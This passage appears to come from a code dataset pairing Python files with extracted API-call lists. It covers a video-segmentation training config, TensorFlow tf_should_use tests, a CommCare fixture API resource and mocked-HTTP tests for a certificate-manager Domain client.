self.DATA_WORKERS = 4
self.DATA_RANDOMCROP = (465, 465)
self.DATA_RANDOMFLIP = 0.5
self.DATA_MAX_CROP_STEPS = 5
self.DATA_MIN_SCALE_FACTOR = 1.
self.DATA_MAX_SCALE_FACTOR = 1.3
self.DATA_SHORT_EDGE_LEN = 480
self.DATA_RANDOM_REVERSE_SEQ = True
self.DATA_DAVIS_REPEAT = 30
self.DATA_CURR_SEQ_LEN = 3
self.DATA_RANDOM_GAP_DAVIS = 3
self.DATA_RANDOM_GAP_YTB = 3
self.PRETRAIN = True
self.PRETRAIN_FULL = False
self.PRETRAIN_MODEL = './pretrain_models/mobilenetv2-deeplabv3p.pth.tar'
self.MODEL_BACKBONE = 'mobilenet'
self.MODEL_MODULE = 'networks.cfbi.cfbi'
self.MODEL_OUTPUT_STRIDE = 16
self.MODEL_ASPP_OUTDIM = 256
self.MODEL_SHORTCUT_DIM = 48
self.MODEL_SEMANTIC_EMBEDDING_DIM = 100
self.MODEL_HEAD_EMBEDDING_DIM = 256
self.MODEL_PRE_HEAD_EMBEDDING_DIM = 64
self.MODEL_GN_GROUPS = 32
self.MODEL_GN_EMB_GROUPS = 25
self.MODEL_MULTI_LOCAL_DISTANCE = [2, 4, 6, 8, 10, 12]
self.MODEL_LOCAL_DOWNSAMPLE = True
self.MODEL_REFINE_CHANNELS = 64 # n * 32
self.MODEL_LOW_LEVEL_INPLANES = 256 if self.MODEL_BACKBONE == 'resnet' else 24
self.MODEL_RELATED_CHANNELS = 64
self.MODEL_EPSILON = 1e-5
self.MODEL_MATCHING_BACKGROUND = True
self.MODEL_GCT_BETA_WD = True
self.MODEL_FLOAT16_MATCHING = True
self.MODEL_FREEZE_BN = True
self.MODEL_FREEZE_BACKBONE = False
self.TRAIN_TOTAL_STEPS = 100000
self.TRAIN_START_STEP = 0
self.TRAIN_LR = 0.01
self.TRAIN_MOMENTUM = 0.9
self.TRAIN_COSINE_DECAY = False
self.TRAIN_WARM_UP_STEPS = 1000
self.TRAIN_WEIGHT_DECAY = 15e-5
self.TRAIN_POWER = 0.9
self.TRAIN_GPUS = 4
self.TRAIN_BATCH_SIZE = 8
self.TRAIN_START_SEQ_TRAINING_STEPS = self.TRAIN_TOTAL_STEPS / 2
self.TRAIN_TBLOG = False
self.TRAIN_TBLOG_STEP = 60
self.TRAIN_LOG_STEP = 20
self.TRAIN_IMG_LOG = False
self.TRAIN_TOP_K_PERCENT_PIXELS = 0.15
self.TRAIN_HARD_MINING_STEP = self.TRAIN_TOTAL_STEPS / 2
self.TRAIN_CLIP_GRAD_NORM = 5.
self.TRAIN_SAVE_STEP = 1000
self.TRAIN_MAX_KEEP_CKPT = 8
self.TRAIN_RESUME = False
self.TRAIN_RESUME_CKPT = None
self.TRAIN_RESUME_STEP = 0
self.TRAIN_AUTO_RESUME = True
self.TRAIN_GLOBAL_ATROUS_RATE = 1
self.TRAIN_LOCAL_ATROUS_RATE = 1
self.TRAIN_GLOBAL_CHUNKS = 20
self.TRAIN_DATASET_FULL_RESOLUTION = True
self.TEST_GPU_ID = 0
self.TEST_DATASET = 'youtubevos'
self.TEST_DATASET_FULL_RESOLUTION = False
self.TEST_DATASET_SPLIT = ['val']
self.TEST_CKPT_PATH = None
self.TEST_CKPT_STEP = None # if "None", evaluate the latest checkpoint.
self.TEST_FLIP = False
self.TEST_MULTISCALE = [1]
self.TEST_MIN_SIZE = None
self.TEST_MAX_SIZE = 800 * 1.3 if self.TEST_MULTISCALE == [1] else 800
self.TEST_WORKERS = 4
self.TEST_GLOBAL_CHUNKS = 4
self.TEST_GLOBAL_ATROUS_RATE = 2
self.TEST_LOCAL_ATROUS_RATE = 1
# dist
self.DIST_ENABLE = True
self.DIST_BACKEND = "gloo"
self.DIST_URL = "file://./sharefile"
self.DIST_START_GPU = 0
self.__check()
def __check(self):
if not torch.cuda.is_available():
            raise ValueError('config.py: cuda is not available')
if self.TRAIN_GPUS == 0:
raise ValueError('config.py: the number of GPU is 0')
for path in [self.DIR_RESULT, self.DIR_CKPT, self.DIR_LOG, self.DIR_EVALUATION, self.DIR_IMG_LOG, self.DIR_TB_LOG]:
if not os.path.isdir(path):
os.makedirs(path)
cfg = Configuration()
| [
"torch.cuda.is_available",
"os.path.join",
"os.path.isdir",
"os.makedirs"
]
| [((219, 258), 'os.path.join', 'os.path.join', (['self.DIR_ROOT', '"""datasets"""'], {}), "(self.DIR_ROOT, 'datasets')\n", (231, 258), False, 'import os\n'), ((285, 321), 'os.path.join', 'os.path.join', (['self.DIR_DATA', '"""DAVIS"""'], {}), "(self.DIR_DATA, 'DAVIS')\n", (297, 321), False, 'import os\n'), ((346, 386), 'os.path.join', 'os.path.join', (['self.DIR_DATA', '"""YTB/train"""'], {}), "(self.DIR_DATA, 'YTB/train')\n", (358, 386), False, 'import os\n'), ((416, 456), 'os.path.join', 'os.path.join', (['self.DIR_DATA', '"""YTB/valid"""'], {}), "(self.DIR_DATA, 'YTB/valid')\n", (428, 456), False, 'import os\n'), ((483, 535), 'os.path.join', 'os.path.join', (['self.DIR_ROOT', '"""result"""', 'self.EXP_NAME'], {}), "(self.DIR_ROOT, 'result', self.EXP_NAME)\n", (495, 535), False, 'import os\n'), ((560, 597), 'os.path.join', 'os.path.join', (['self.DIR_RESULT', '"""ckpt"""'], {}), "(self.DIR_RESULT, 'ckpt')\n", (572, 597), False, 'import os\n'), ((621, 657), 'os.path.join', 'os.path.join', (['self.DIR_RESULT', '"""log"""'], {}), "(self.DIR_RESULT, 'log')\n", (633, 657), False, 'import os\n'), ((685, 728), 'os.path.join', 'os.path.join', (['self.DIR_RESULT', '"""log"""', '"""img"""'], {}), "(self.DIR_RESULT, 'log', 'img')\n", (697, 728), False, 'import os\n'), ((755, 806), 'os.path.join', 'os.path.join', (['self.DIR_RESULT', '"""log"""', '"""tensorboard"""'], {}), "(self.DIR_RESULT, 'log', 'tensorboard')\n", (767, 806), False, 'import os\n'), ((837, 874), 'os.path.join', 'os.path.join', (['self.DIR_RESULT', '"""eval"""'], {}), "(self.DIR_RESULT, 'eval')\n", (849, 874), False, 'import os\n'), ((4385, 4410), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (4408, 4410), False, 'import torch\n'), ((4726, 4745), 'os.path.isdir', 'os.path.isdir', (['path'], {}), '(path)\n', (4739, 4745), False, 'import os\n'), ((4763, 4780), 'os.makedirs', 'os.makedirs', (['path'], {}), '(path)\n', (4774, 4780), False, 'import os\n')] |
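A small, hedged sketch of how a module-level `cfg` object like the one above is typically consumed, here to resolve a checkpoint path; the file-name pattern is an assumption for illustration only:

import os

def checkpoint_path(cfg, step):
    """Return a checkpoint path under cfg.DIR_CKPT for a global step (assumed naming scheme)."""
    return os.path.join(cfg.DIR_CKPT, 'save_step_%d.pth' % step)

# e.g. checkpoint_path(cfg, 1000) -> './result/mobilenetv2_cfbi/ckpt/save_step_1000.pth'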
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Unit tests for tf_should_use."""
# pylint: disable=unused-import
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import gc
import sys
from tensorflow.python.framework import constant_op
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
from tensorflow.python.util import tf_should_use
@contextlib.contextmanager
def reroute_error():
"""Temporarily reroute errors written to tf_logging.error into `captured`."""
with test.mock.patch.object(tf_should_use.tf_logging, 'error') as error:
with test.mock.patch.object(tf_should_use.tf_logging, 'fatal') as fatal:
yield error, fatal
class TfShouldUseTest(test.TestCase):
def testAddShouldUseWarningWhenNotUsed(self):
c = constant_op.constant(0, name='blah0')
def in_this_function():
h = tf_should_use._add_should_use_warning(c)
del h
with reroute_error() as (error, _):
in_this_function()
error.assert_called()
msg = '\n'.join(error.call_args[0])
self.assertIn('Object was never used', msg)
self.assertIn('blah0:0', msg)
self.assertIn('in_this_function', msg)
self.assertFalse(gc.garbage)
def testAddShouldUseFatalWhenNotUsed(self):
c = constant_op.constant(0, name='blah0')
def in_this_function():
h = tf_should_use._add_should_use_warning(c, fatal_error=True)
del h
with reroute_error() as (_, fatal):
in_this_function()
fatal.assert_called()
msg = '\n'.join(fatal.call_args[0])
self.assertIn('Object was never used', msg)
self.assertIn('blah0:0', msg)
self.assertIn('in_this_function', msg)
self.assertFalse(gc.garbage)
def _testAddShouldUseWarningWhenUsed(self, fn, name):
c = constant_op.constant(0, name=name)
with reroute_error() as (error, fatal):
h = tf_should_use._add_should_use_warning(c)
fn(h)
del h
error.assert_not_called()
fatal.assert_not_called()
def testAddShouldUseWarningWhenUsedWithAdd(self):
def add(h):
_ = h + 1
self._testAddShouldUseWarningWhenUsed(add, name='blah_add')
gc.collect()
self.assertFalse(gc.garbage)
def testAddShouldUseWarningWhenUsedWithGetName(self):
def get_name(h):
_ = h.name
self._testAddShouldUseWarningWhenUsed(get_name, name='blah_get_name')
gc.collect()
self.assertFalse(gc.garbage)
def testShouldUseResult(self):
@tf_should_use.should_use_result
def return_const(value):
return constant_op.constant(value, name='blah2')
with reroute_error() as (error, _):
return_const(0.0)
error.assert_called()
msg = '\n'.join(error.call_args[0])
self.assertIn('Object was never used', msg)
self.assertIn('blah2:0', msg)
self.assertIn('return_const', msg)
gc.collect()
self.assertFalse(gc.garbage)
def testShouldUseResultWhenNotReallyUsed(self):
@tf_should_use.should_use_result
def return_const(value):
return constant_op.constant(value, name='blah3')
with reroute_error() as (error, _):
with self.test_session():
return_const(0.0)
# Creating another op and executing it does not mark the
# unused op as being "used".
v = constant_op.constant(1.0, name='meh')
v.eval()
error.assert_called()
msg = '\n'.join(error.call_args[0])
self.assertIn('Object was never used', msg)
self.assertIn('blah3:0', msg)
self.assertIn('return_const', msg)
gc.collect()
self.assertFalse(gc.garbage)
# Tests that mark_used is available in the API.
def testMarkUsed(self):
@tf_should_use.should_use_result
def return_const(value):
return constant_op.constant(value, name='blah3')
with self.test_session():
return_const(0.0).mark_used()
if __name__ == '__main__':
test.main()
| [
"tensorflow.python.util.tf_should_use._add_should_use_warning",
"tensorflow.python.framework.constant_op.constant",
"gc.collect",
"tensorflow.python.platform.test.mock.patch.object",
"tensorflow.python.platform.test.main"
]
| [((4539, 4550), 'tensorflow.python.platform.test.main', 'test.main', ([], {}), '()\n', (4548, 4550), False, 'from tensorflow.python.platform import test\n'), ((1240, 1297), 'tensorflow.python.platform.test.mock.patch.object', 'test.mock.patch.object', (['tf_should_use.tf_logging', '"""error"""'], {}), "(tf_should_use.tf_logging, 'error')\n", (1262, 1297), False, 'from tensorflow.python.platform import test\n'), ((1507, 1544), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(0)'], {'name': '"""blah0"""'}), "(0, name='blah0')\n", (1527, 1544), False, 'from tensorflow.python.framework import constant_op\n'), ((1980, 2017), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(0)'], {'name': '"""blah0"""'}), "(0, name='blah0')\n", (2000, 2017), False, 'from tensorflow.python.framework import constant_op\n'), ((2481, 2515), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(0)'], {'name': 'name'}), '(0, name=name)\n', (2501, 2515), False, 'from tensorflow.python.framework import constant_op\n'), ((2848, 2860), 'gc.collect', 'gc.collect', ([], {}), '()\n', (2858, 2860), False, 'import gc\n'), ((3067, 3079), 'gc.collect', 'gc.collect', ([], {}), '()\n', (3077, 3079), False, 'import gc\n'), ((3523, 3535), 'gc.collect', 'gc.collect', ([], {}), '()\n', (3533, 3535), False, 'import gc\n'), ((4199, 4211), 'gc.collect', 'gc.collect', ([], {}), '()\n', (4209, 4211), False, 'import gc\n'), ((1317, 1374), 'tensorflow.python.platform.test.mock.patch.object', 'test.mock.patch.object', (['tf_should_use.tf_logging', '"""fatal"""'], {}), "(tf_should_use.tf_logging, 'fatal')\n", (1339, 1374), False, 'from tensorflow.python.platform import test\n'), ((1583, 1623), 'tensorflow.python.util.tf_should_use._add_should_use_warning', 'tf_should_use._add_should_use_warning', (['c'], {}), '(c)\n', (1620, 1623), False, 'from tensorflow.python.util import tf_should_use\n'), ((2056, 2114), 'tensorflow.python.util.tf_should_use._add_should_use_warning', 'tf_should_use._add_should_use_warning', (['c'], {'fatal_error': '(True)'}), '(c, fatal_error=True)\n', (2093, 2114), False, 'from tensorflow.python.util import tf_should_use\n'), ((2570, 2610), 'tensorflow.python.util.tf_should_use._add_should_use_warning', 'tf_should_use._add_should_use_warning', (['c'], {}), '(c)\n', (2607, 2610), False, 'from tensorflow.python.util import tf_should_use\n'), ((3226, 3267), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['value'], {'name': '"""blah2"""'}), "(value, name='blah2')\n", (3246, 3267), False, 'from tensorflow.python.framework import constant_op\n'), ((3699, 3740), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['value'], {'name': '"""blah3"""'}), "(value, name='blah3')\n", (3719, 3740), False, 'from tensorflow.python.framework import constant_op\n'), ((4401, 4442), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['value'], {'name': '"""blah3"""'}), "(value, name='blah3')\n", (4421, 4442), False, 'from tensorflow.python.framework import constant_op\n'), ((3953, 3990), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(1.0)'], {'name': '"""meh"""'}), "(1.0, name='meh')\n", (3973, 3990), False, 'from tensorflow.python.framework import constant_op\n')] |
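As a hedged illustration of the decorator exercised by the tests above (using the same TF 1.x internal imports as the record, which are not public API), the typical producer/consumer pattern looks like this:

from tensorflow.python.framework import constant_op
from tensorflow.python.util import tf_should_use

@tf_should_use.should_use_result
def make_marker():
    # The wrapped return value must be used, or .mark_used() must be called;
    # otherwise an "Object was never used" error is logged at garbage collection.
    return constant_op.constant(0, name='marker')

marker = make_marker()
marker.mark_used()  # explicitly silence the warning when the value is intentionally unused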
from couchdbkit import ResourceNotFound
from tastypie import fields as tp_f
from corehq.apps.api.resources import JsonResource
from corehq.apps.api.resources.v0_1 import (
CustomResourceMeta,
RequirePermissionAuthentication,
)
from corehq.apps.api.util import get_object_or_not_exist
from corehq.apps.fixtures.models import FixtureDataItem, FixtureDataType
from corehq.apps.users.models import Permissions
def convert_fdt(fdi):
try:
fdt = FixtureDataType.get(fdi.data_type_id)
fdi.fixture_type = fdt.tag
return fdi
except ResourceNotFound:
return fdi
class FixtureResource(JsonResource):
type = "fixture"
fields = tp_f.DictField(attribute='try_fields_without_attributes',
readonly=True, unique=True)
# when null, that means the ref'd fixture type was not found
fixture_type = tp_f.CharField(attribute='fixture_type', readonly=True,
null=True)
id = tp_f.CharField(attribute='_id', readonly=True, unique=True)
def obj_get(self, bundle, **kwargs):
return convert_fdt(get_object_or_not_exist(
FixtureDataItem, kwargs['pk'], kwargs['domain']))
def obj_get_list(self, bundle, **kwargs):
domain = kwargs['domain']
parent_id = bundle.request.GET.get("parent_id", None)
parent_ref_name = bundle.request.GET.get("parent_ref_name", None)
references = bundle.request.GET.get("references", None)
child_type = bundle.request.GET.get("child_type", None)
type_id = bundle.request.GET.get("fixture_type_id", None)
type_tag = bundle.request.GET.get("fixture_type", None)
if parent_id and parent_ref_name and child_type and references:
parent_fdi = FixtureDataItem.get(parent_id)
fdis = list(
FixtureDataItem.by_field_value(
domain, child_type, parent_ref_name,
parent_fdi.fields_without_attributes[references])
)
elif type_id or type_tag:
type_id = type_id or FixtureDataType.by_domain_tag(
domain, type_tag).one()
fdis = list(FixtureDataItem.by_data_type(domain, type_id))
else:
fdis = list(FixtureDataItem.by_domain(domain))
return [convert_fdt(fdi) for fdi in fdis] or []
class Meta(CustomResourceMeta):
authentication = RequirePermissionAuthentication(Permissions.edit_apps)
object_class = FixtureDataItem
resource_name = 'fixture'
limit = 0
| [
"corehq.apps.api.resources.v0_1.RequirePermissionAuthentication",
"tastypie.fields.CharField",
"corehq.apps.fixtures.models.FixtureDataItem.by_domain",
"corehq.apps.api.util.get_object_or_not_exist",
"corehq.apps.fixtures.models.FixtureDataItem.by_field_value",
"corehq.apps.fixtures.models.FixtureDataType.by_domain_tag",
"tastypie.fields.DictField",
"corehq.apps.fixtures.models.FixtureDataItem.get",
"corehq.apps.fixtures.models.FixtureDataType.get",
"corehq.apps.fixtures.models.FixtureDataItem.by_data_type"
]
| [((674, 763), 'tastypie.fields.DictField', 'tp_f.DictField', ([], {'attribute': '"""try_fields_without_attributes"""', 'readonly': '(True)', 'unique': '(True)'}), "(attribute='try_fields_without_attributes', readonly=True,\n unique=True)\n", (688, 763), True, 'from tastypie import fields as tp_f\n'), ((872, 938), 'tastypie.fields.CharField', 'tp_f.CharField', ([], {'attribute': '"""fixture_type"""', 'readonly': '(True)', 'null': '(True)'}), "(attribute='fixture_type', readonly=True, null=True)\n", (886, 938), True, 'from tastypie import fields as tp_f\n'), ((982, 1041), 'tastypie.fields.CharField', 'tp_f.CharField', ([], {'attribute': '"""_id"""', 'readonly': '(True)', 'unique': '(True)'}), "(attribute='_id', readonly=True, unique=True)\n", (996, 1041), True, 'from tastypie import fields as tp_f\n'), ((461, 498), 'corehq.apps.fixtures.models.FixtureDataType.get', 'FixtureDataType.get', (['fdi.data_type_id'], {}), '(fdi.data_type_id)\n', (480, 498), False, 'from corehq.apps.fixtures.models import FixtureDataItem, FixtureDataType\n'), ((2417, 2471), 'corehq.apps.api.resources.v0_1.RequirePermissionAuthentication', 'RequirePermissionAuthentication', (['Permissions.edit_apps'], {}), '(Permissions.edit_apps)\n', (2448, 2471), False, 'from corehq.apps.api.resources.v0_1 import CustomResourceMeta, RequirePermissionAuthentication\n'), ((1111, 1183), 'corehq.apps.api.util.get_object_or_not_exist', 'get_object_or_not_exist', (['FixtureDataItem', "kwargs['pk']", "kwargs['domain']"], {}), "(FixtureDataItem, kwargs['pk'], kwargs['domain'])\n", (1134, 1183), False, 'from corehq.apps.api.util import get_object_or_not_exist\n'), ((1771, 1801), 'corehq.apps.fixtures.models.FixtureDataItem.get', 'FixtureDataItem.get', (['parent_id'], {}), '(parent_id)\n', (1790, 1801), False, 'from corehq.apps.fixtures.models import FixtureDataItem, FixtureDataType\n'), ((1843, 1964), 'corehq.apps.fixtures.models.FixtureDataItem.by_field_value', 'FixtureDataItem.by_field_value', (['domain', 'child_type', 'parent_ref_name', 'parent_fdi.fields_without_attributes[references]'], {}), '(domain, child_type, parent_ref_name,\n parent_fdi.fields_without_attributes[references])\n', (1873, 1964), False, 'from corehq.apps.fixtures.models import FixtureDataItem, FixtureDataType\n'), ((2178, 2223), 'corehq.apps.fixtures.models.FixtureDataItem.by_data_type', 'FixtureDataItem.by_data_type', (['domain', 'type_id'], {}), '(domain, type_id)\n', (2206, 2223), False, 'from corehq.apps.fixtures.models import FixtureDataItem, FixtureDataType\n'), ((2263, 2296), 'corehq.apps.fixtures.models.FixtureDataItem.by_domain', 'FixtureDataItem.by_domain', (['domain'], {}), '(domain)\n', (2288, 2296), False, 'from corehq.apps.fixtures.models import FixtureDataItem, FixtureDataType\n'), ((2083, 2130), 'corehq.apps.fixtures.models.FixtureDataType.by_domain_tag', 'FixtureDataType.by_domain_tag', (['domain', 'type_tag'], {}), '(domain, type_tag)\n', (2112, 2130), False, 'from corehq.apps.fixtures.models import FixtureDataItem, FixtureDataType\n')] |
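A hypothetical client-side sketch of querying the fixture endpoint defined above; the host, project space, API version, filter value and credentials below are placeholders, not taken from the record:

import requests

resp = requests.get(
    'https://example-hq.invalid/a/demo-domain/api/v0.5/fixture/',
    params={'fixture_type': 'city'},  # handled in obj_get_list via the type_tag branch
    auth=('[email protected]', 'password'),
)
resp.raise_for_status()
fixtures = resp.json()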
# -*- coding: utf-8 -*-
"""Define the cert_manager.domain.Domain unit tests."""
# Don't warn about things that happen as that is part of unit testing
# pylint: disable=protected-access
# pylint: disable=no-member
import json
from requests.exceptions import HTTPError
from testtools import TestCase
import responses
from cert_manager.domain import Domain, DomainCreationResponseError
from .lib.testbase import ClientFixture
class TestDomain(TestCase): # pylint: disable=too-few-public-methods
"""Serve as a Base class for all tests of the Domain class."""
def setUp(self): # pylint: disable=invalid-name
"""Initialize the class."""
# Call the inherited setUp method
super().setUp()
# Make sure the Client fixture is created and setup
self.cfixt = self.useFixture(ClientFixture())
self.client = self.cfixt.client
self.api_url = f"{self.cfixt.base_url}/domain/v1"
# Setup a test response one would expect normally
self.valid_response = [
{"id": 1234, "name": "example.com"},
{"id": 4321, "name": "*.example.com"},
{"id": 4322, "name": "subdomain.example.com"},
]
# Setup a test response for getting a specific Domain
self.valid_individual_response = self.valid_response[0]
self.valid_individual_response["status"] = "Active"
# Setup JSON to return in an error
self.error_response = {"description": "domain error"}
class TestInit(TestDomain):
"""Test the class initializer."""
@responses.activate
def test_param(self):
"""The URL should change if api_version is passed as a parameter."""
# Set a new version
version = "v3"
api_url = f"{self.cfixt.base_url}/domain/{version}"
# Setup the mocked response
responses.add(responses.GET, api_url, json=self.valid_response, status=200)
domain = Domain(client=self.client, api_version=version)
data = domain.all()
# Verify all the query information
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, api_url)
self.assertEqual(data, self.valid_response)
def test_need_client(self):
"""The class should raise an exception without a client parameter."""
self.assertRaises(TypeError, Domain)
class TestAll(TestDomain):
"""Test the .all method."""
@responses.activate
def test_cached(self):
"""The function should return all the data, but should not query the API twice."""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.valid_response, status=200)
domain = Domain(client=self.client)
data = domain.all()
data = domain.all()
# Verify all the query information
# There should only be one call the first time "all" is called.
# Due to pagination, this is only guaranteed as long as the number of
# entries returned is less than the page size
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, self.api_url)
self.assertEqual(data, self.valid_response)
@responses.activate
def test_forced(self):
"""The function should return all the data, but should query the API twice."""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.valid_response, status=200)
domain = Domain(client=self.client)
data = domain.all()
data = domain.all(force=True)
# Verify all the query information
# There should only be one call the first time "all" is called.
# Due to pagination, this is only guaranteed as long as the number of
# entries returned is less than the page size
self.assertEqual(len(responses.calls), 2)
self.assertEqual(responses.calls[0].request.url, self.api_url)
self.assertEqual(responses.calls[1].request.url, self.api_url)
self.assertEqual(data, self.valid_response)
@responses.activate
def test_bad_http(self):
"""The function should raise an HTTPError exception if domains cannot be retrieved from the API."""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.error_response, status=400)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.all)
# Verify all the query information
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, self.api_url)
class TestFind(TestDomain):
"""Test the .find method."""
@responses.activate
def test_no_params(self):
"""Without parameters, the method will return all domains"""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.valid_response, status=200)
domain = Domain(client=self.client)
data = domain.find()
self.assertEqual(data, self.valid_response)
@responses.activate
def test_params(self):
"""Parameters will be passed to API"""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.valid_response[0], status=200)
api_url = f"{self.api_url}?name=example.com"
domain = Domain(client=self.client)
data = domain.find(name="example.com")
# Verify all the query information
self.assertEqual(responses.calls[0].request.url, api_url)
self.assertEqual(data, self.valid_response[0])
@responses.activate
def test_bad_http(self):
"""The function should raise an HTTPError exception if domains cannot be retrieved from the API."""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.error_response, status=400)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.find)
# Verify all the query information
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, self.api_url)
class TestCount(TestDomain):
"""Test the .count method."""
@responses.activate
def test_no_params(self):
"""Without parameters, the method will count all domains"""
# Setup the mocked response
count = {"count": len(self.valid_response)}
api_url = f"{self.api_url}/count"
responses.add(responses.GET, api_url, json=count, status=200)
domain = Domain(client=self.client)
data = domain.count()
self.assertEqual(data, count)
self.assertEqual(responses.calls[0].request.url, api_url)
@responses.activate
def test_params(self):
"""Parameters will be passed to API"""
# Setup the mocked response
count = {"count": len(self.valid_response[0])}
api_url = f"{self.api_url}/count"
responses.add(responses.GET, api_url, json=count, status=200)
domain = Domain(client=self.client)
data = domain.count(name="example.com")
# Verify all the query information
self.assertEqual(responses.calls[0].request.url, f"{api_url}?name=example.com")
self.assertEqual(data, count)
@responses.activate
def test_bad_http(self):
"""The function should raise an HTTPError exception if counts cannot be retrieved from the API."""
# Setup the mocked response
api_url = f"{self.api_url}/count"
responses.add(responses.GET, api_url, json=self.error_response, status=400)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.count)
# Verify all the query information
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, api_url)
class TestGet(TestDomain):
"""Test the .get method."""
@responses.activate
def test_need_domain_id(self):
"""The function should raise an exception without an domain_id parameter."""
domain = Domain(client=self.client)
self.assertRaises(TypeError, domain.get)
@responses.activate
def test_domain_id(self):
"""The function should return data about the specified Domain ID."""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}"
# Setup the mocked response
responses.add(responses.GET, api_url, json=self.valid_individual_response, status=200)
domain = Domain(client=self.client)
data = domain.get(domain_id)
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, api_url)
self.assertEqual(data, self.valid_individual_response)
@responses.activate
def test_ne_domain_id(self):
"""The function should raise an HTTPError exception if the specified Domain ID does not exist."""
domain_id = 2345
api_url = f"{self.api_url}/{str(domain_id)}"
# Setup the mocked response
responses.add(responses.GET, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.get, domain_id)
class TestCreate(TestDomain):
"""Test the .create method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# Not going to check every permutation of missing parameters,
# but verify that something is required
self.assertRaises(TypeError, domain.create)
@responses.activate
def test_create_success(self):
"""
The function should return the created domain ID,
as well as add all parameters to the request body
"""
# Setup the mocked response
domain_id = 1234
org_id = 4321
types = ["SSL"]
location = f"{self.api_url}/{str(domain_id)}"
responses.add(responses.POST, self.api_url, headers={"Location": location}, status=201)
domain = Domain(client=self.client)
post_data = {
"name": "sub2.example.com",
"delegations": [{"orgId": org_id, "certTypes": types}]
}
response = domain.create("sub2.example.com", org_id, types)
self.assertEqual(response, {"id": domain_id})
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_create_success_optional_params(self):
"""
The function should return the created domain ID when additional params are specified,
as well add the non-required parameters to the request body
"""
# Setup the mocked response
domain_id = 1234
location = f"{self.api_url}/{str(domain_id)}"
responses.add(responses.POST, self.api_url, headers={"Location": location}, status=201)
domain = Domain(client=self.client)
post_data = {
"name": "sub2.example.com",
"delegations": [{"orgId": 4321, "certTypes": ["SSL"]}],
"description": "Example sub domain"
}
response = domain.create("sub2.example.com", 4321, ["SSL"], description="Example sub domain")
self.assertEqual(response, {"id": domain_id})
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_create_failure_http_error(self):
"""
The function should return an error code and description if the Domain
creation failed.
"""
# Setup the mocked response
responses.add(responses.POST, self.api_url, json=self.error_response,
status=400)
domain = Domain(client=self.client)
create_args = {
"name": "sub2.example.com",
"org_id": 4321,
"cert_types": ["other"]
}
self.assertRaises(ValueError, domain.create, **create_args)
@responses.activate
def test_create_failure_http_status_unexpected(self):
"""
The function should return an error code and description if the Domain
creation failed with DomainCreationResponseError
(unexpected HTTP status code).
"""
# Setup the mocked response
responses.add(responses.POST, self.api_url, json=self.error_response,
status=200)
domain = Domain(client=self.client)
create_args = {
"name": "sub2.example.com",
"org_id": 4321,
"cert_types": ["SSL"]
}
self.assertRaises(DomainCreationResponseError, domain.create, **create_args)
@responses.activate
def test_create_failure_missing_location_header(self):
"""
The function should return an error code and description if the Domain
creation failed with DomainCreationResponseError
(no Location header in response).
"""
# Setup the mocked response
responses.add(responses.POST, self.api_url, status=201)
domain = Domain(client=self.client)
create_args = {
"name": "sub2.example.com",
"org_id": 4321,
"cert_types": ["SSL"]
}
self.assertRaises(DomainCreationResponseError, domain.create, **create_args)
@responses.activate
def test_create_failure_domain_id_not_found(self):
"""
The function should return an error code and description if the Domain
creation failed with DomainCreationResponseError
(Domain ID not found in response).
"""
# Setup the mocked response
responses.add(responses.POST, self.api_url, headers={"Location": "not a url"}, status=201)
domain = Domain(client=self.client)
create_args = {
"name": "sub2.example.com",
"org_id": 4321,
"cert_types": ["SSL"]
}
self.assertRaises(DomainCreationResponseError, domain.create, **create_args)
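# Illustrative helper (an assumption, not part of the original test module): the
# pattern the test classes above share, namely registering a mocked endpoint with
# `responses` and then exercising one Domain method against it. Intended to be
# called from inside a @responses.activate test.
def _example_mocked_all(client, api_url):
    """Sketch: mock a GET endpoint and list all domains through it."""
    responses.add(responses.GET, api_url, json=[{"id": 1, "name": "example.com"}], status=200)
    return Domain(client=client).all()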
class TestDelete(TestDomain):
"""Test the .delete method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.delete)
@responses.activate
def test_delete_success(self):
"""The function should return True if the deletion succeeded."""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}"
# Setup the mocked response
responses.add(responses.DELETE, api_url, status=200)
